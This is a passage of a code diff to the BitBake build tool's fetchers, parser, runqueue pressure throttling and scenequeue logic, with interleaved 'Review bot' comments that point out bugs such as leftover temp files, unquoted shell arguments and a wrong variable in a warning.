+ # created; this only happens if at least one blob needed to be
+ # downloaded.
+ if os.path.exists(os.path.join(tmpdir, "git", ".git", "lfs")):
+ runfetchcmd("tar -cf - lfs | tar -xf - -C %s" % ud.clonedir, d, workdir="%s/git/.git" % tmpdir)
+ finally:
+ bb.utils.remove(tmpdir, recurse=True)
+
def build_mirror_data(self, ud, d):
+
+ # Create as a temp file and move atomically into position to avoid races
+ @contextmanager
+ def create_atomic(filename):
+ fd, tfile = tempfile.mkstemp(dir=os.path.dirname(filename))
+ try:
+ yield tfile
+ umask = os.umask(0o666)
+ os.umask(umask)
+ os.chmod(tfile, (0o666 & ~umask))
+ os.rename(tfile, filename)
+ finally:
+ os.close(fd)
+
if ud.shallow and ud.write_shallow_tarballs:
if not os.path.exists(ud.fullshallow):
if os.path.islink(ud.fullshallow):
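Review bot: create_atomic never removes the temporary file when the body of the `with` raises, so a failed `tar` leaves a partial temp file in the mirror directory on every failed attempt. An `except` branch that unlinks `tfile` before re-raising fixes that. Separately, reading the umask through `os.umask(0o666)` briefly changes the process-wide umask, so any file another thread creates in that window gets more restrictive permissions than intended; that deserves a comment at least. build_mirror_data continues outside this hunk.

```python
def create_atomic(filename):
    # … unchanged: mkstemp, try/yield, chmod to (0o666 & ~umask), os.rename …
    except BaseException:
        # A failed tar must not leave a partial temp file next to the tarball
        try:
            os.unlink(tfile)
        except FileNotFoundError:
            pass
        raise
    # … unchanged: finally / os.close(fd) …
```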
@@ -389,7 +448,8 @@ class Git(FetchMethod):
self.clone_shallow_local(ud, shallowclone, d)
logger.info("Creating tarball of git repository")
- runfetchcmd("tar -czf %s ." % ud.fullshallow, d, workdir=shallowclone)
+ with create_atomic(ud.fullshallow) as tfile:
+ runfetchcmd("tar -czf %s ." % tfile, d, workdir=shallowclone)
runfetchcmd("touch %s.done" % ud.fullshallow, d)
finally:
bb.utils.remove(tempdir, recurse=True)
@@ -398,7 +458,8 @@ class Git(FetchMethod):
os.unlink(ud.fullmirror)
logger.info("Creating tarball of git repository")
- runfetchcmd("tar -czf %s ." % ud.fullmirror, d, workdir=ud.clonedir)
+ with create_atomic(ud.fullmirror) as tfile:
+ runfetchcmd("tar -czf %s ." % tfile, d, workdir=ud.clonedir)
runfetchcmd("touch %s.done" % ud.fullmirror, d)
def clone_shallow_local(self, ud, dest, d):
@@ -473,7 +534,10 @@ class Git(FetchMethod):
if os.path.exists(destdir):
bb.utils.prunedir(destdir)
- need_lfs = ud.parm.get("lfs", "1") == "1"
+ need_lfs = self._need_lfs(ud)
+
+ if not need_lfs:
+ ud.basecmd = "GIT_LFS_SKIP_SMUDGE=1 " + ud.basecmd
source_found = False
source_error = []
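Review bot: Prepending `GIT_LFS_SKIP_SMUDGE=1 ` by reassigning `ud.basecmd` changes the `ud` object itself rather than this one call. The prefix therefore stays on every later command built from `ud.basecmd`, and it is added again each time this code runs with lfs disabled. A guard such as `if not need_lfs and "GIT_LFS_SKIP_SMUDGE=" not in ud.basecmd:`, or a local copy of the command, would keep the effect scoped. The enclosing method starts and ends outside the hunk, so whether `ud` is reused across calls should be confirmed.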
@@ -501,12 +565,12 @@ class Git(FetchMethod):
raise bb.fetch2.UnpackError("No up to date source found: " + "; ".join(source_error), ud.url)
repourl = self._get_repo_url(ud)
- runfetchcmd("%s remote set-url origin \"%s\"" % (ud.basecmd, repourl), d, workdir=destdir)
+ runfetchcmd("%s remote set-url origin %s" % (ud.basecmd, shlex.quote(repourl)), d, workdir=destdir)
if self._contains_lfs(ud, d, destdir):
if need_lfs and not self._find_git_lfs(d):
raise bb.fetch2.FetchError("Repository %s has LFS content, install git-lfs on host to download (or set lfs=0 to ignore it)" % (repourl))
- else:
+ elif not need_lfs:
bb.note("Repository %s has LFS content but it is not being fetched" % (repourl))
if not ud.nocheckout:
@@ -559,12 +623,28 @@ class Git(FetchMethod):
raise bb.fetch2.FetchError("The command '%s' gave output with more then 1 line unexpectedly, output: '%s'" % (cmd, output))
return output.split()[0] != "0"
+ def _need_lfs(self, ud):
+ return ud.parm.get("lfs", "1") == "1"
+
def _contains_lfs(self, ud, d, wd):
"""
Check if the repository has 'lfs' (large file) content
"""
- cmd = "%s grep lfs HEAD:.gitattributes | wc -l" % (
- ud.basecmd)
+
+ if not ud.nobranch:
+ branchname = ud.branches[ud.names[0]]
+ else:
+ branchname = "master"
+
+ # The bare clonedir doesn't use the remote names; it has the branch immediately.
+ if wd == ud.clonedir:
+ refname = ud.branches[ud.names[0]]
+ else:
+ refname = "origin/%s" % ud.branches[ud.names[0]]
+
+ cmd = "%s grep lfs %s:.gitattributes | wc -l" % (
+ ud.basecmd, refname)
+
try:
output = runfetchcmd(cmd, d, quiet=True, workdir=wd)
if int(output) > 0:
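Review bot: `branchname` is computed in _contains_lfs but never used. Both `refname` assignments read `ud.branches[ud.names[0]]` directly, so the `"master"` fallback for `ud.nobranch` has no effect. If the fallback is intended, build the ref from it: `refname = branchname if wd == ud.clonedir else "origin/%s" % branchname`. `refname` is also interpolated into the shell command unquoted; passing `shlex.quote("%s:.gitattributes" % refname)` would match the quoting this commit adds for `repourl`. The method body continues outside the hunk.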
@@ -613,8 +693,8 @@ class Git(FetchMethod):
d.setVar('_BB_GIT_IN_LSREMOTE', '1')
try:
repourl = self._get_repo_url(ud)
- cmd = "%s ls-remote \"%s\" %s" % \
- (ud.basecmd, repourl, search)
+ cmd = "%s ls-remote %s %s" % \
+ (ud.basecmd, shlex.quote(repourl), search)
if ud.proto.lower() != 'file':
bb.fetch2.check_network_access(d, cmd, repourl)
output = runfetchcmd(cmd, d, True)
diff --git a/bitbake/lib/bb/fetch2/wget.py b/bitbake/lib/bb/fetch2/wget.py
index f7d1de26b7..368c644337 100644
--- a/bitbake/lib/bb/fetch2/wget.py
+++ b/bitbake/lib/bb/fetch2/wget.py
@@ -52,6 +52,12 @@ class WgetProgressHandler(bb.progress.LineFilterProgressHandler):
class Wget(FetchMethod):
+
+ # CDNs like CloudFlare may do a 'browser integrity test' which can fail
+ # with the standard wget/urllib User-Agent, so pretend to be a modern
+ # browser.
+ user_agent = "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:84.0) Gecko/20100101 Firefox/84.0"
+
"""Class to fetch urls via 'wget'"""
def supports(self, ud, d):
"""
@@ -91,10 +97,9 @@ class Wget(FetchMethod):
fetchcmd = self.basecmd
- if 'downloadfilename' in ud.parm:
- localpath = os.path.join(d.getVar("DL_DIR"), ud.localfile)
- bb.utils.mkdirhier(os.path.dirname(localpath))
- fetchcmd += " -O %s" % shlex.quote(localpath)
+ localpath = os.path.join(d.getVar("DL_DIR"), ud.localfile) + ".tmp"
+ bb.utils.mkdirhier(os.path.dirname(localpath))
+ fetchcmd += " -O %s" % shlex.quote(localpath)
if ud.user and ud.pswd:
fetchcmd += " --user=%s --password=%s --auth-no-challenge" % (ud.user, ud.pswd)
@@ -108,6 +113,10 @@ class Wget(FetchMethod):
self._runwget(ud, d, fetchcmd, False)
+ # Remove the ".tmp" and move the file into position atomically
+ # Our lock prevents multiple writers but mirroring code may grab incomplete files
+ os.rename(localpath, localpath[:-4])
+
# Sanity check since wget can pretend it succeed when it didn't
# Also, this used to happen if sourceforge sent us to the mirror page
if not os.path.exists(ud.localpath):
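Review bot: The `.tmp` file is renamed to its final name before the sanity checks that follow, so a download that wget wrongly reported as successful is already published under the final name when those checks run. That is the case the added comment says mirroring code can pick up. Checking `localpath` first (existence here, plus any size check that follows outside this hunk) and renaming only afterwards would close that window. `localpath[:-4]` also depends on the literal length of `".tmp"`; `os.rename(localpath, ud.localpath)` would be clearer if `ud.localpath` is the same path, which this hunk does not show.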
@@ -300,7 +309,7 @@ class Wget(FetchMethod):
# Some servers (FusionForge, as used on Alioth) require that the
# optional Accept header is set.
r.add_header("Accept", "*/*")
- r.add_header("User-Agent", "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.12) Gecko/20101027 Ubuntu/9.10 (karmic) Firefox/3.6.12")
+ r.add_header("User-Agent", self.user_agent)
def add_basic_auth(login_str, request):
'''Adds Basic auth to http request, pass in login:password as string'''
import base64
@@ -319,7 +328,7 @@ class Wget(FetchMethod):
except (TypeError, ImportError, IOError, netrc.NetrcParseError):
pass
- with opener.open(r) as response:
+ with opener.open(r, timeout=30) as response:
pass
except urllib.error.URLError as e:
if try_again:
@@ -404,9 +413,8 @@ class Wget(FetchMethod):
"""
f = tempfile.NamedTemporaryFile()
with tempfile.TemporaryDirectory(prefix="wget-index-") as workdir, tempfile.NamedTemporaryFile(dir=workdir, prefix="wget-listing-") as f:
- agent = "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.12) Gecko/20101027 Ubuntu/9.10 (karmic) Firefox/3.6.12"
fetchcmd = self.basecmd
- fetchcmd += " -O " + f.name + " --user-agent='" + agent + "' '" + uri + "'"
+ fetchcmd += " -O " + f.name + " --user-agent='" + self.user_agent + "' '" + uri + "'"
try:
self._runwget(ud, d, fetchcmd, True, workdir=workdir)
fetchresult = f.read()
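Review bot: `uri` and `self.user_agent` are wrapped in hand-written single quotes when `fetchcmd` is built, so a single quote inside `uri` ends the quoted argument and the remainder is parsed by the shell. This file already uses `shlex.quote` for the `-O` path in the download method, so the line can be `fetchcmd += " -O %s --user-agent=%s %s" % (shlex.quote(f.name), shlex.quote(self.user_agent), shlex.quote(uri))`. The `f = tempfile.NamedTemporaryFile()` above the `with` is immediately shadowed and looks redundant. The method continues outside the hunk.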
diff --git a/bitbake/lib/bb/monitordisk.py b/bitbake/lib/bb/monitordisk.py
index e7c07264a8..4d243af30b 100644
--- a/bitbake/lib/bb/monitordisk.py
+++ b/bitbake/lib/bb/monitordisk.py
@@ -229,9 +229,10 @@ class diskMonitor:
freeInode = st.f_favail
if minInode and freeInode < minInode:
- # Some filesystems use dynamic inodes so can't run out
- # (e.g. btrfs). This is reported by the inode count being 0.
- if st.f_files == 0:
+ # Some filesystems use dynamic inodes so can't run out.
+ # This is reported by the inode count being 0 (btrfs) or the free
+ # inode count being -1 (cephfs).
+ if st.f_files == 0 or st.f_favail == -1:
self.devDict[k][2] = None
continue
# Always show warning, the self.checked would always be False if the action is WARN
diff --git a/bitbake/lib/bb/msg.py b/bitbake/lib/bb/msg.py
index 2d88c4e72d..1b1a23bb50 100644
--- a/bitbake/lib/bb/msg.py
+++ b/bitbake/lib/bb/msg.py
@@ -146,18 +146,12 @@ class LogFilterLTLevel(logging.Filter):
#
loggerDefaultLogLevel = BBLogFormatter.NOTE
-loggerDefaultVerbose = False
-loggerVerboseLogs = False
loggerDefaultDomains = {}
def init_msgconfig(verbose, debug, debug_domains=None):
"""
Set default verbosity and debug levels config the logger
"""
- bb.msg.loggerDefaultVerbose = verbose
- if verbose:
- bb.msg.loggerVerboseLogs = True
-
if debug:
bb.msg.loggerDefaultLogLevel = BBLogFormatter.DEBUG - debug + 1
elif verbose:
diff --git a/bitbake/lib/bb/parse/ast.py b/bitbake/lib/bb/parse/ast.py
index eb8cfa21b8..9f46f3f35a 100644
--- a/bitbake/lib/bb/parse/ast.py
+++ b/bitbake/lib/bb/parse/ast.py
@@ -97,6 +97,7 @@ class DataNode(AstNode):
def eval(self, data):
groupd = self.groupd
key = groupd["var"]
+ key = key.replace(":", "_")
loginfo = {
'variable': key,
'file': self.filename,
@@ -207,6 +208,7 @@ class ExportFuncsNode(AstNode):
def eval(self, data):
for func in self.n:
+ func = func.replace(":", "_")
calledfunc = self.classname + "_" + func
if data.getVar(func, False) and not data.getVarFlag(func, 'export_func', False):
diff --git a/bitbake/lib/bb/parse/parse_py/BBHandler.py b/bitbake/lib/bb/parse/parse_py/BBHandler.py
index 6e216effb8..8781129fc1 100644
--- a/bitbake/lib/bb/parse/parse_py/BBHandler.py
+++ b/bitbake/lib/bb/parse/parse_py/BBHandler.py
@@ -22,7 +22,7 @@ from .ConfHandler import include, init
# For compatibility
bb.deprecate_import(__name__, "bb.parse", ["vars_from_file"])
-__func_start_regexp__ = re.compile(r"(((?P<py>python)|(?P<fr>fakeroot))\s*)*(?P<func>[\w\.\-\+\{\}\$]+)?\s*\(\s*\)\s*{$" )
+__func_start_regexp__ = re.compile(r"(((?P<py>python(?=(\s|\()))|(?P<fr>fakeroot(?=\s)))\s*)*(?P<func>[\w\.\-\+\{\}\$:]+)?\s*\(\s*\)\s*{$" )
__inherit_regexp__ = re.compile(r"inherit\s+(.+)" )
__export_func_regexp__ = re.compile(r"EXPORT_FUNCTIONS\s+(.+)" )
__addtask_regexp__ = re.compile(r"addtask\s+(?P<func>\w+)\s*((before\s*(?P<before>((.*(?=after))|(.*))))|(after\s*(?P<after>((.*(?=before))|(.*)))))*")
diff --git a/bitbake/lib/bb/parse/parse_py/ConfHandler.py b/bitbake/lib/bb/parse/parse_py/ConfHandler.py
index af64d3446e..a7e81bd6ad 100644
--- a/bitbake/lib/bb/parse/parse_py/ConfHandler.py
+++ b/bitbake/lib/bb/parse/parse_py/ConfHandler.py
@@ -20,7 +20,7 @@ from bb.parse import ParseError, resolve_file, ast, logger, handle
__config_regexp__ = re.compile( r"""
^
(?P<exp>export\s+)?
- (?P<var>[a-zA-Z0-9\-_+.${}/~]+?)
+ (?P<var>[a-zA-Z0-9\-_+.${}/~:]+?)
(\[(?P<flag>[a-zA-Z0-9\-_+.]+)\])?
\s* (
diff --git a/bitbake/lib/bb/persist_data.py b/bitbake/lib/bb/persist_data.py
index 7357ab2d44..56c983f816 100644
--- a/bitbake/lib/bb/persist_data.py
+++ b/bitbake/lib/bb/persist_data.py
@@ -12,14 +12,15 @@ currently, providing a key/value store accessed by 'domain'.
#
import collections
+import collections.abc
+import contextlib
+import functools
import logging
import os.path
+import sqlite3
import sys
import warnings
-from bb.compat import total_ordering
-from collections import Mapping
-import sqlite3
-import contextlib
+from collections.abc import Mapping
sqlversion = sqlite3.sqlite_version_info
if sqlversion[0] < 3 or (sqlversion[0] == 3 and sqlversion[1] < 3):
@@ -28,8 +29,8 @@ if sqlversion[0] < 3 or (sqlversion[0] == 3 and sqlversion[1] < 3):
logger = logging.getLogger("BitBake.PersistData")
-@total_ordering
-class SQLTable(collections.MutableMapping):
+@functools.total_ordering
+class SQLTable(collections.abc.MutableMapping):
class _Decorators(object):
@staticmethod
def retry(*, reconnect=True):
diff --git a/bitbake/lib/bb/process.py b/bitbake/lib/bb/process.py
index 2dc472a86f..24c588e533 100644
--- a/bitbake/lib/bb/process.py
+++ b/bitbake/lib/bb/process.py
@@ -179,5 +179,8 @@ def run(cmd, input=None, log=None, extrafiles=None, **options):
stderr = stderr.decode("utf-8")
if pipe.returncode != 0:
+ if log:
+ # Don't duplicate the output in the exception if logging it
+ raise ExecutionError(cmd, pipe.returncode, None, None)
raise ExecutionError(cmd, pipe.returncode, stdout, stderr)
return stdout, stderr
diff --git a/bitbake/lib/bb/providers.py b/bitbake/lib/bb/providers.py
index 81459c36d5..484e1ea4f3 100644
--- a/bitbake/lib/bb/providers.py
+++ b/bitbake/lib/bb/providers.py
@@ -151,7 +151,7 @@ def findPreferredProvider(pn, cfgData, dataCache, pkg_pn = None, item = None):
if item:
itemstr = " (for item %s)" % item
if preferred_file is None:
- logger.info("preferred version %s of %s not available%s", pv_str, pn, itemstr)
+ logger.warning("preferred version %s of %s not available%s", pv_str, pn, itemstr)
available_vers = []
for file_set in pkg_pn:
for f in file_set:
@@ -163,7 +163,7 @@ def findPreferredProvider(pn, cfgData, dataCache, pkg_pn = None, item = None):
available_vers.append(ver_str)
if available_vers:
available_vers.sort()
- logger.info("versions of %s available: %s", pn, ' '.join(available_vers))
+ logger.warning("versions of %s available: %s", pn, ' '.join(available_vers))
else:
logger.debug(1, "selecting %s as PREFERRED_VERSION %s of package %s%s", preferred_file, pv_str, pn, itemstr)
diff --git a/bitbake/lib/bb/runqueue.py b/bitbake/lib/bb/runqueue.py
index 30cab5379e..886eef1f27 100644
--- a/bitbake/lib/bb/runqueue.py
+++ b/bitbake/lib/bb/runqueue.py
@@ -24,6 +24,7 @@ import pickle
from multiprocessing import Process
import shlex
import pprint
+import time
bblogger = logging.getLogger("BitBake")
logger = logging.getLogger("BitBake.RunQueue")
@@ -142,6 +143,55 @@ class RunQueueScheduler(object):
self.buildable.append(tid)
self.rev_prio_map = None
+ self.is_pressure_usable()
+
+ def is_pressure_usable(self):
+ """
+ If monitoring pressure, return True if pressure files can be open and read. For example
+ openSUSE /proc/pressure/* files have readable file permissions but when read the error EOPNOTSUPP (Operation not supported)
+ is returned.
+ """
+ if self.rq.max_cpu_pressure or self.rq.max_io_pressure or self.rq.max_memory_pressure:
+ try:
+ with open("/proc/pressure/cpu") as cpu_pressure_fds, \
+ open("/proc/pressure/io") as io_pressure_fds, \
+ open("/proc/pressure/memory") as memory_pressure_fds:
+
+ self.prev_cpu_pressure = cpu_pressure_fds.readline().split()[4].split("=")[1]
+ self.prev_io_pressure = io_pressure_fds.readline().split()[4].split("=")[1]
+ self.prev_memory_pressure = memory_pressure_fds.readline().split()[4].split("=")[1]
+ self.prev_pressure_time = time.time()
+ self.check_pressure = True
+ except:
+ bb.note("The /proc/pressure files can't be read. Continuing build without monitoring pressure")
+ self.check_pressure = False
+ else:
+ self.check_pressure = False
+
+ def exceeds_max_pressure(self):
+ """
+ Monitor the difference in total pressure at least once per second, if
+ BB_PRESSURE_MAX_{CPU|IO|MEMORY} are set, return True if above threshold.
+ """
+ if self.check_pressure:
+ with open("/proc/pressure/cpu") as cpu_pressure_fds, \
+ open("/proc/pressure/io") as io_pressure_fds, \
+ open("/proc/pressure/memory") as memory_pressure_fds:
+ # extract "total" from /proc/pressure/{cpu|io}
+ curr_cpu_pressure = cpu_pressure_fds.readline().split()[4].split("=")[1]
+ curr_io_pressure = io_pressure_fds.readline().split()[4].split("=")[1]
+ curr_memory_pressure = memory_pressure_fds.readline().split()[4].split("=")[1]
+ exceeds_cpu_pressure = self.rq.max_cpu_pressure and (float(curr_cpu_pressure) - float(self.prev_cpu_pressure)) > self.rq.max_cpu_pressure
+ exceeds_io_pressure = self.rq.max_io_pressure and (float(curr_io_pressure) - float(self.prev_io_pressure)) > self.rq.max_io_pressure
+ exceeds_memory_pressure = self.rq.max_memory_pressure and (float(curr_memory_pressure) - float(self.prev_memory_pressure)) > self.rq.max_memory_pressure
+ now = time.time()
+ if now - self.prev_pressure_time > 1.0:
+ self.prev_cpu_pressure = curr_cpu_pressure
+ self.prev_io_pressure = curr_io_pressure
+ self.prev_memory_pressure = curr_memory_pressure
+ self.prev_pressure_time = now
+ return (exceeds_cpu_pressure or exceeds_io_pressure or exceeds_memory_pressure)
+ return False
def next_buildable_task(self):
"""
@@ -155,6 +205,12 @@ class RunQueueScheduler(object):
if not buildable:
return None
+ # Bitbake requires that at least one task be active. Only check for pressure if
+ # this is the case, otherwise the pressure limitation could result in no tasks
+ # being active and no new tasks started thereby, at times, breaking the scheduler.
+ if self.rq.stats.active and self.exceeds_max_pressure():
+ return None
+
# Filter out tasks that have a max number of threads that have been exceeded
skip_buildable = {}
for running in self.rq.runq_running.difference(self.rq.runq_complete):
@@ -1256,8 +1312,8 @@ class RunQueue:
"fakerootnoenv" : self.rqdata.dataCaches[mc].fakerootnoenv,
"sigdata" : bb.parse.siggen.get_taskdata(),
"logdefaultlevel" : bb.msg.loggerDefaultLogLevel,
- "logdefaultverbose" : bb.msg.loggerDefaultVerbose,
- "logdefaultverboselogs" : bb.msg.loggerVerboseLogs,
+ "build_verbose_shell" : self.cooker.configuration.build_verbose_shell,
+ "build_verbose_stdout" : self.cooker.configuration.build_verbose_stdout,
"logdefaultdomain" : bb.msg.loggerDefaultDomains,
"prhost" : self.cooker.prhost,
"buildname" : self.cfgData.getVar("BUILDNAME"),
@@ -1700,6 +1756,9 @@ class RunQueueExecute:
self.number_tasks = int(self.cfgData.getVar("BB_NUMBER_THREADS") or 1)
self.scheduler = self.cfgData.getVar("BB_SCHEDULER") or "speed"
+ self.max_cpu_pressure = self.cfgData.getVar("BB_PRESSURE_MAX_CPU")
+ self.max_io_pressure = self.cfgData.getVar("BB_PRESSURE_MAX_IO")
+ self.max_memory_pressure = self.cfgData.getVar("BB_PRESSURE_MAX_MEMORY")
self.sq_buildable = set()
self.sq_running = set()
@@ -1735,6 +1794,29 @@ class RunQueueExecute:
if self.number_tasks <= 0:
bb.fatal("Invalid BB_NUMBER_THREADS %s" % self.number_tasks)
+ lower_limit = 1.0
+ upper_limit = 1000000.0
+ if self.max_cpu_pressure:
+ self.max_cpu_pressure = float(self.max_cpu_pressure)
+ if self.max_cpu_pressure < lower_limit:
+ bb.fatal("Invalid BB_PRESSURE_MAX_CPU %s, minimum value is %s." % (self.max_cpu_pressure, lower_limit))
+ if self.max_cpu_pressure > upper_limit:
+ bb.warn("Your build will be largely unregulated since BB_PRESSURE_MAX_CPU is set to %s. It is very unlikely that such high pressure will be experienced." % (self.max_cpu_pressure))
+
+ if self.max_io_pressure:
+ self.max_io_pressure = float(self.max_io_pressure)
+ if self.max_io_pressure < lower_limit:
+ bb.fatal("Invalid BB_PRESSURE_MAX_IO %s, minimum value is %s." % (self.max_io_pressure, lower_limit))
+ if self.max_io_pressure > upper_limit:
+ bb.warn("Your build will be largely unregulated since BB_PRESSURE_MAX_IO is set to %s. It is very unlikely that such high pressure will be experienced." % (self.max_io_pressure))
+
+ if self.max_memory_pressure:
+ self.max_memory_pressure = float(self.max_memory_pressure)
+ if self.max_memory_pressure < lower_limit:
+ bb.fatal("Invalid BB_PRESSURE_MAX_MEMORY %s, minimum value is %s." % (self.max_memory_pressure, lower_limit))
+ if self.max_memory_pressure > upper_limit:
+ bb.warn("Your build will be largely unregulated since BB_PRESSURE_MAX_MEMORY is set to %s. It is very unlikely that such high pressure will be experienced." % (self.max_io_pressure))
+
# List of setscene tasks which we've covered
self.scenequeue_covered = set()
# List of tasks which are covered (including setscene ones)
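Review bot: The warning for BB_PRESSURE_MAX_MEMORY formats `self.max_io_pressure`, so it reports the I/O limit (or `None` when that variable is unset) instead of the memory value; the last argument should be `self.max_memory_pressure`. The three `float(...)` conversions are also unguarded, so a non-numeric setting would presumably surface as a `ValueError` traceback rather than the `bb.fatal("Invalid BB_PRESSURE_MAX_...")` message used for values below the minimum. Catching `ValueError` around each conversion and calling `bb.fatal` there would keep the handling of bad configuration consistent. The enclosing method starts and ends outside the hunk.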
@@ -1893,6 +1975,20 @@ class RunQueueExecute:
self.setbuildable(revdep)
logger.debug(1, "Marking task %s as buildable", revdep)
+ found = None
+ for t in sorted(self.sq_deferred.copy()):
+ if self.sq_deferred[t] == task:
+ # Allow the next deferred task to run. Any other deferred tasks should be deferred after that task.
+ # We shouldn't allow all to run at once as it is prone to races.
+ if not found:
+ bb.note("Deferred task %s now buildable" % t)
+ del self.sq_deferred[t]
+ update_scenequeue_data([t], self.sqdata, self.rqdata, self.rq, self.cooker, self.stampcache, self, summary=False)
+ found = t
+ else:
+ bb.note("Deferring %s after %s" % (t, found))
+ self.sq_deferred[t] = found
+
def task_complete(self, task):
self.stats.taskCompleted()
bb.event.fire(runQueueTaskCompleted(task, self.stats, self.rq), self.cfgData)
@@ -1934,6 +2030,10 @@ class RunQueueExecute:
logger.error("Scenequeue had holdoff tasks: %s" % pprint.pformat(self.holdoff_tasks))
err = True
+ for tid in self.scenequeue_covered.intersection(self.scenequeue_notcovered):
+ # No task should end up in both covered and uncovered, that is a bug.
+ logger.error("Setscene task %s in both covered and notcovered." % tid)
+
for tid in self.rqdata.runq_setscene_tids:
if tid not in self.scenequeue_covered and tid not in self.scenequeue_notcovered:
err = True
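Review bot: The new loop logs a task found in both `scenequeue_covered` and `scenequeue_notcovered` but does not set `err = True`, unlike the holdoff check just above it and the missing-task check just below it. The added comment calls this state a bug, yet as far as the hunk shows it would not mark the sanity check as failed. Consider adding `err = True` after the `logger.error(...)` call, or extending the comment to say why this case is report-only. The enclosing method starts and ends outside the hunk.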
@@ -1998,8 +2098,6 @@ class RunQueueExecute:
logger.debug(1, "%s didn't become valid, skipping setscene" % nexttask)
self.sq_task_failoutright(nexttask)
return True
- else:
- self.sqdata.outrightfail.remove(nexttask)
if nexttask in self.sqdata.outrightfail:
logger.debug(2, 'No package found, so skipping setscene task %s', nexttask)
self.sq_task_failoutright(nexttask)
@@ -2150,7 +2248,8 @@ class RunQueueExecute:
if self.sq_deferred:
tid = self.sq_deferred.pop(list(self.sq_deferred.keys())[0])
logger.warning("Runqeueue deadlocked on deferred tasks, forcing task %s" % tid)
- self.sq_task_failoutright(tid)
+ if tid not in self.runq_complete:
+ self.sq_task_failoutright(tid)
return True
if len(self.failed_tids) != 0:
@@ -2264,10 +2363,16 @@ class RunQueueExecute:
self.updated_taskhash_queue.remove((tid, unihash))
if unihash != self.rqdata.runtaskentries[tid].unihash:
- hashequiv_logger.verbose("Task %s unihash changed to %s" % (tid, unihash))
- self.rqdata.runtaskentries[tid].unihash = unihash
- bb.parse.siggen.set_unihash(tid, unihash)
- toprocess.add(tid)
+ # Make sure we rehash any other tasks with the same task hash that we're deferred against.
+ torehash = [tid]
+ for deftid in self.sq_deferred:
+ if self.sq_deferred[deftid] == tid:
+ torehash.append(deftid)
+ for hashtid in torehash:
+ hashequiv_logger.verbose("Task %s unihash changed to %s" % (hashtid, unihash))
+ self.rqdata.runtaskentries[hashtid].unihash = unihash
+ bb.parse.siggen.set_unihash(hashtid, unihash)
+ toprocess.add(hashtid)
# Work out all tasks which depend upon these
total = set()
@@ -2406,6 +2511,14 @@ class RunQueueExecute:
if update_tasks:
self.sqdone = False
+ for mc in sorted(self.sqdata.multiconfigs):
+ for tid in sorted([t[0] for t in update_tasks]):
+ if mc_from_tid(tid) != mc:
+ continue
+ h = pending_hash_index(tid, self.rqdata)
+ if h in self.sqdata.hashes and tid != self.sqdata.hashes[h]:
+ self.sq_deferred[tid] = self.sqdata.hashes[h]
+ bb.note("Deferring %s after %s" % (tid, self.sqdata.hashes[h]))
update_scenequeue_data([t[0] for t in update_tasks], self.sqdata, self.rqdata, self.rq, self.cooker, self.stampcache, self, summary=False)
for (tid, harddepfail, origvalid) in update_tasks:
@@ -2421,6 +2534,9 @@ class RunQueueExecute:
for dep in sorted(self.sqdata.sq_deps[task]):
if fail and task in self.sqdata.sq_harddeps and dep in self.sqdata.sq_harddeps[task]:
+ if dep in self.scenequeue_covered or dep in self.scenequeue_notcovered:
+ # dependency could be already processed, e.g. noexec setscene task
+ continue
logger.debug(2, "%s was unavailable and is a hard dependency of %s so skipping" % (task, dep))
self.sq_task_failoutright(dep)
continue
@@ -2743,6 +2859,19 @@ def build_scenequeue_data(sqdata, rqdata, rq, cooker, stampcache, sqrq):
sqdata.stamppresent = set()
sqdata.valid = set()
+ sqdata.hashes = {}
+ sqrq.sq_deferred = {}
+ for mc in sorted(sqdata.multiconfigs):
+ for tid in sorted(sqdata.sq_revdeps):
+ if mc_from_tid(tid) != mc:
+ continue
+ h = pending_hash_index(tid, rqdata)
+ if h not in sqdata.hashes:
+ sqdata.hashes[h] = tid
+ else:
+ sqrq.sq_deferred[tid] = sqdata.hashes[h]
+ bb.note("Deferring %s after %s" % (tid, sqdata.hashes[h]))
+
update_scenequeue_data(sqdata.sq_revdeps, sqdata, rqdata, rq, cooker, stampcache, sqrq, summary=True)
def update_scenequeue_data(tids, sqdata, rqdata, rq, cooker, stampcache, sqrq, summary=True):
@@ -2754,6 +2883,8 @@ def update_scenequeue_data(tids, sqdata, rqdata, rq, cooker, stampcache, sqrq, s
sqdata.stamppresent.remove(tid)
if tid in sqdata.valid:
sqdata.valid.remove(tid)
+ if tid in sqdata.outrightfail:
+ sqdata.outrightfail.remove(tid)
(mc, fn, taskname, taskfn) = split_tid_mcfn(tid)
@@ -2781,28 +2912,20 @@ def update_scenequeue_data(tids, sqdata, rqdata, rq, cooker, stampcache, sqrq, s
sqdata.valid |= rq.validate_hashes(tocheck, cooker.data, len(sqdata.stamppresent), False, summary=summary)
- sqdata.hashes = {}
- for mc in sorted(sqdata.multiconfigs):
- for tid in sorted(sqdata.sq_revdeps):
- if mc_from_tid(tid) != mc:
- continue
- if tid in sqdata.stamppresent:
- continue
- if tid in sqdata.valid:
- continue
- if tid in sqdata.noexec:
- continue
- if tid in sqrq.scenequeue_notcovered:
- continue
- sqdata.outrightfail.add(tid)
-
- h = pending_hash_index(tid, rqdata)
- if h not in sqdata.hashes:
- sqdata.hashes[h] = tid
- else:
- sqrq.sq_deferred[tid] = sqdata.hashes[h]
- bb.note("Deferring %s after %s" % (tid, sqdata.hashes[h]))
-
+ for tid in tids:
+ if tid in sqdata.stamppresent:
+ continue
+ if tid in sqdata.valid:
+ continue
+ if tid in sqdata.noexec:
+ continue
+ if tid in sqrq.scenequeue_covered:
+ continue
+ if tid in sqrq.scenequeue_notcovered:
+ continue
+ if tid in sqrq.sq_deferred:
+ continue
+ sqdata.outrightfail.add(tid)
class TaskFailure(Exception):
"""
diff --git a/bitbake/lib/bb/server/process.py b/bitbake/lib/bb/server/process.py
index b66fbe0acd..4bdb84ae37 100644
--- a/bitbake/lib/bb/server/process.py
+++ b/bitbake/lib/bb/server/process.py
@@ -25,6 +25,7 @@ import subprocess
import errno
import re
import datetime
+import gc
import bb.server.xmlrpcserver
from bb import daemonize
from multiprocessing import queues
@@ -152,7 +153,8 @@ class ProcessServer(multiprocessing.Process):
conn = newconnections.pop(-1)
fds.append(conn)
self.controllersock = conn
- elif self.timeout is None and not ready:
+
+ elif not self.timeout and not ready:
print("No timeout, exiting.")
self.quit = True
@@ -220,6 +222,7 @@ class ProcessServer(multiprocessing.Process):
try:
print("Running command %s" % command)
self.command_channel_reply.send(self.cooker.command.runCommand(command))
+ print("Command Completed")
except Exception as e:
logger.exception('Exception in server main event loop running command %s (%s)' % (command, str(e)))
